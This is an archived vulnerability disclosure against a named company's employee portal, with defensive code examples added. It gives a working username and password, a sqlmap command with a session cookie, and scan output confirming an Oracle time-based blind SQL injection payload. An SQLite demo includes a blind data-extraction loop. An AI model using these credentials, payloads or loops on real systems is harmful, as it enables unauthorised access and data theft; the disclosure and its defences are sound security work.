
Vulnerability summary

Defect ID: wooyun-2015-0129388

Title: 华润化工控股有限公司 (China Resources Chemical Holdings) information portal configuration flaw / SQL injection

Vendor: 华润化工控股有限公司

Author: 凌零1

Submitted: 2015-07-28 12:39

Fix time: 2015-07-30 14:10

Published: 2015-07-30 14:10

Type: design flaw / logic error

Severity: high

Self-assessed rank: 20

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-28: details sent to the vendor, awaiting the vendor's handling
2015-07-30: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Saw someone submit a China Resources report last night, so I came to have a look first thing this morning!

Detailed description:

http://eip.crcchem.com/login/Login.jsp?logintype=1
The username is easy to guess: it is simply the site name, crcchem. Worse, the login page returns a distinct "username incorrect" error when the account does not exist, so an attacker can confirm which usernames are valid and then brute-force only the password. The portal account used here:
Username: crcchem
Password: abc12345
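The login behaviour described above, and the shape of the fix, as an added example (not the portal's code and not the report author's): a leaky check that answers "username incorrect" separately, beside a hardened check that gives one generic message, does the same hashing work whether or not the account exists, and locks the account after repeated failures. The user store, salt, iteration count and lockout numbers are all constructed for the demo.

```python
import hashlib
import hmac
import time
from collections import defaultdict

# Cost kept low for the demo; a production deployment uses a far higher iteration count.
_ITERATIONS = 20_000
_SALT = b"demo-salt-not-secret"          # constructed; a real store salts per user


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


# Constructed user store holding the guessable account from the report.
USERS = {"crcchem": _hash("abc12345")}
# Digest compared against for unknown users, precomputed so both code paths do exactly
# one PBKDF2 evaluation per attempt.
_DUMMY = _hash("not-a-real-password")


def login_leaky(username: str, password: str) -> str:
    """The behaviour the report relies on: a different message when the username is
    unknown, so an attacker confirms accounts first and then only guesses passwords."""
    if username not in USERS:
        return "username incorrect"
    if hmac.compare_digest(USERS[username], _hash(password)):
        return "ok"
    return "password incorrect"


class HardenedLogin:
    """One generic failure message, constant hashing work whether or not the user exists,
    and a per-account lockout after repeated failures."""

    GENERIC = "invalid username or password"

    def __init__(self, max_failures: int = 5, lockout_seconds: int = 900, clock=time.time):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock                     # injectable so the lockout can be tested
        self.failures = defaultdict(int)
        self.locked_until = {}

    def login(self, username: str, password: str) -> str:
        now = self.clock()
        if self.locked_until.get(username, 0) > now:
            return self.GENERIC                # a locked account fails identically, even with the right password
        # Hash the attempt unconditionally and compare against a dummy digest for unknown
        # users, so response time does not reveal whether the account exists.
        expected = USERS.get(username, _DUMMY)
        ok = hmac.compare_digest(expected, _hash(password)) and username in USERS
        if ok:
            self.failures.pop(username, None)
            return "ok"
        self.failures[username] += 1
        if self.failures[username] >= self.max_failures:
            self.locked_until[username] = now + self.lockout_seconds
            self.failures.pop(username, None)
        return self.GENERIC


if __name__ == "__main__":
    print(login_leaky("nobody", "x"), "/", login_leaky("crcchem", "x"))   # two different answers
    h = HardenedLogin()
    print(h.login("nobody", "x"), "/", h.login("crcchem", "x"))           # the same answer
```

Per-account lockout on its own lets an attacker who knows the username lock the real user out, so in practice it is paired with per-source rate limiting or a CAPTCHA after a few failures rather than used alone.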



Proof:

Looking around the back end, there is SQL injection. Only one point was tested; there are very likely others, so I did not test further:
http://eip.crcchem.com/homepage/Homepage.jsp?hpid=61&subCompanyId=21&isfromportal=1&isfromhp=0

C:\Python27\sqlmap>sqlmap.py -u "http://eip.crcchem.com/homepage/Homepage.jsp?hpid=61&subCompanyId=21&isfromportal=1&isfromhp=0" -p "hpid" --cookie "testBanCookie=test; JSESSIONID=abcmHSSRt405C4B6i8h7u; loginfileweaver=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D21%26logintype%3D1%26gopage%3D; loginidweaver=1357; languageidweaver=7"

sqlmap {1.0-dev-nongit-20150609}  http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:21:46
[09:21:47] [INFO] testing connection to the target URL
[09:21:49] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:21:51] [INFO] target URL is stable
[09:21:51] [WARNING] heuristic (basic) test shows that GET parameter 'hpid' might not be injectable
[09:21:52] [INFO] heuristic (XSS) test shows that GET parameter 'hpid' might be vulnerable to XSS attacks
[09:21:52] [INFO] testing for SQL injection on GET parameter 'hpid'
[09:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:21:53] [WARNING] reflective value(s) found and filtering out
[09:22:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[09:22:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:22:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:22:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[09:22:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:22:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[09:22:28] [INFO] testing 'MySQL inline queries'
[09:22:29] [INFO] testing 'PostgreSQL inline queries'
[09:22:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:22:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[09:22:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[09:22:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[09:22:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[09:22:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[09:22:54] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:22:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:23:04] [INFO] testing 'Oracle AND time-based blind'
[09:24:05] [INFO] GET parameter 'hpid' seems to be 'Oracle AND time-based blind' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n]
[09:24:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:24:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:24:29] [INFO] checking if the injection point on GET parameter 'hpid' is a false positive
[09:24:59] [WARNING] there is a possibility that the target (or WAF) is dropping 'suspicious' requests
GET parameter 'hpid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 115 HTTP(s) requests:
---
Parameter: hpid (GET)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: hpid=61 AND 1918=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(121)||CHR(117)||CHR(122),5)&subCompanyId=21&isfromportal=1&isfromhp=0
---
[09:26:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
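The sqlmap run above left 115 requests against one JSP, each carrying a time-delay primitive in the hpid parameter. As an added example (not part of the report, and not the vendor's tooling), the detection a defender would run over the web server's access log: URL-decode each query parameter, match the DBMS_PIPE.RECEIVE_MESSAGE / SLEEP / WAITFOR DELAY / pg_sleep family, and count requests per client and path so a burst like this stands out. The log format and all sample lines are constructed; the portal's real log shape is unknown.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Delay primitives that time-based blind payloads rely on, per DBMS. The Oracle one is the
# DBMS_PIPE.RECEIVE_MESSAGE call in the sqlmap payload above.
TIME_BASED = re.compile(
    r"DBMS_PIPE\.RECEIVE_MESSAGE|\bSLEEP\s*\(|WAITFOR\s+DELAY|\bPG_SLEEP\s*\(|\bBENCHMARK\s*\(",
    re.IGNORECASE,
)

# Combined-style access log line (assumption: the portal logs in this shape).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines: a normal portal request, two time-based probes encoded the way a
# scanner sends them, and an unrelated login hit. None of these are real log data.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Jul/2015:09:21:47 +0800] "GET /homepage/Homepage.jsp?hpid=61&subCompanyId=21&isfromportal=1&isfromhp=0 HTTP/1.1" 200 5123',
    '10.0.0.5 - - [28/Jul/2015:09:22:59 +0800] "GET /homepage/Homepage.jsp?hpid=61%20WAITFOR%20DELAY%20%270%3A0%3A5%27&subCompanyId=21&isfromportal=1&isfromhp=0 HTTP/1.1" 200 5123',
    '10.0.0.5 - - [28/Jul/2015:09:23:04 +0800] "GET /homepage/Homepage.jsp?hpid=61%20AND%201918%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28108%29%7C%7CCHR%28121%29%7C%7CCHR%28117%29%7C%7CCHR%28122%29%2C5%29&subCompanyId=21&isfromportal=1&isfromhp=0 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [28/Jul/2015:09:30:00 +0800] "GET /login/Login.jsp?logintype=1 HTTP/1.1" 200 2210',
]


def scan_log(lines):
    """Return (hits, counts). hits: decoded parameters matching a delay primitive;
    counts: requests per (client IP, path), so a 115-request burst against one JSP stands out."""
    hits = []
    counts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not an access-log line; skip rather than guess
        parts = urlsplit(m["target"])
        key = (m["ip"], parts.path)
        counts[key] = counts.get(key, 0) + 1
        # parse_qs decodes one layer of %xx/+; decode once more so a double-encoded
        # payload does not slip past the regex.
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                value = unquote_plus(value)
                if TIME_BASED.search(value):
                    hits.append({"ip": m["ip"], "ts": m["ts"], "path": parts.path,
                                 "param": param, "payload": value})
    return hits, counts


def noisy_clients(counts, threshold):
    """(ip, path) pairs with at least `threshold` requests in the scanned window."""
    return sorted(k for k, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    hits, counts = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} {h['path']} param={h['param']!r} payload={h['payload']!r}")
    print("bursty:", noisy_clients(counts, threshold=3))
```

The signature match catches the scanner's default payloads; the per-client count is what still fires when a WAF rewrite or a hand-built payload evades the regex, which is why both are kept.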



Fix:

Add a CAPTCHA or similar at the login (better still, per-account lockout or per-source rate limiting, and a single generic error that does not reveal whether the username exists). For the back-end injection, do not rely on filtering alone: validate hpid as an integer and pass it to the query as a bind variable (PreparedStatement) rather than concatenating it into the SQL text.
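What the injected hpid parameter does to the query, and what the bind-variable fix changes, as an added example (not the portal's code; the table, rows and column names are constructed, and SQLite stands in for Oracle). The vulnerable builder concatenates the request value into the SQL text, so "61 AND 1=2" silently changes the WHERE clause; the safe builder validates the type and binds the value, so the same input is rejected. The last two functions show why a single true/false difference is enough: they recover a neighbouring row's title one yes/no question at a time, which is exactly the inference sqlmap's DBMS_PIPE.RECEIVE_MESSAGE(...,5) payload performs with a 5-second delay instead of a content difference.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the portal's homepage table; the real schema is unknown."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE homepage (hpid INTEGER, sub_company_id INTEGER, title TEXT)")
    con.executemany("INSERT INTO homepage VALUES (?, ?, ?)",
                    [(61, 21, "CRC Chem portal"), (62, 21, "Other page")])
    return con


def homepage_vulnerable(con, hpid: str, sub_company_id: str) -> list:
    """The pattern that makes hpid injectable: request values pasted into the SQL text."""
    sql = ("SELECT title FROM homepage WHERE hpid = " + hpid
           + " AND sub_company_id = " + sub_company_id)
    return [row[0] for row in con.execute(sql)]


def homepage_safe(con, hpid: str, sub_company_id: str) -> list:
    """Validate the type, then bind: the value can no longer change the statement's
    structure. (JDBC equivalent: PreparedStatement with setInt.)"""
    hpid_n, sub_n = int(hpid), int(sub_company_id)      # raises ValueError on '61 AND 1=1'
    sql = "SELECT title FROM homepage WHERE hpid = ? AND sub_company_id = ?"
    return [row[0] for row in con.execute(sql, (hpid_n, sub_n))]


def safe_rejects(con, hpid: str) -> bool:
    """True when the hardened handler refuses the value outright."""
    try:
        homepage_safe(con, hpid, "21")
    except ValueError:
        return True
    return False


def blind_oracle(con, condition: str) -> bool:
    """One yes/no question, asked the way a blind injection asks it: does the page still
    render for 'hpid=61 AND (<condition>)'?"""
    return bool(homepage_vulnerable(con, "61 AND (" + condition + ")", "21"))


def extract_title_length(con, target_hpid: int = 62) -> int:
    """Binary-search the length of another row's title using only the oracle above."""
    lo, hi = 0, 64
    while lo < hi:
        mid = (lo + hi) // 2
        if blind_oracle(con, f"(SELECT length(title) FROM homepage WHERE hpid = {target_hpid}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_title(con, target_hpid: int = 62) -> str:
    """Recover the string itself: one binary search over the ASCII range per character."""
    out = []
    for pos in range(1, extract_title_length(con, target_hpid) + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = (f"unicode(substr((SELECT title FROM homepage WHERE hpid = {target_hpid}),"
                     f" {pos}, 1)) > {mid}")
            if blind_oracle(con, probe):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    con = make_db()
    print(homepage_vulnerable(con, "61 AND 1=1", "21"), homepage_vulnerable(con, "61 AND 1=2", "21"))
    print("safe handler rejects payload:", safe_rejects(con, "61 AND 1=1"))
    print("recovered via blind oracle:", extract_title(con))
```

The recovery loop needs roughly seven questions per character; with a 5-second delay per "yes" answer that is slow but entirely mechanical, which is why a WAF that merely filters known keywords (the vendor's "global injection filtering") is not a substitute for binding the parameter.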

Copyright notice: when reposting, please credit 凌零1@乌云


Vendor response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-07-30 14:10

Vendor reply:

Duplicate of wooyun-2015-; when this was found we were already remediating the password policy and adding global injection filtering

Latest status:

None


Vulnerability evaluation:

Comments

  1. 2015-07-30 19:47 | 乌云一朵朵 (passer-by | Rank: 0 | vulnerabilities: 1 | 看那乌云一朵朵。)

    @凌零1 When sqlmap dumps data, the Chinese comes out garbled. How do I fix that? I already added #-*-coding:utf-8-*- on the second line of sqlmap.py but it has no effect.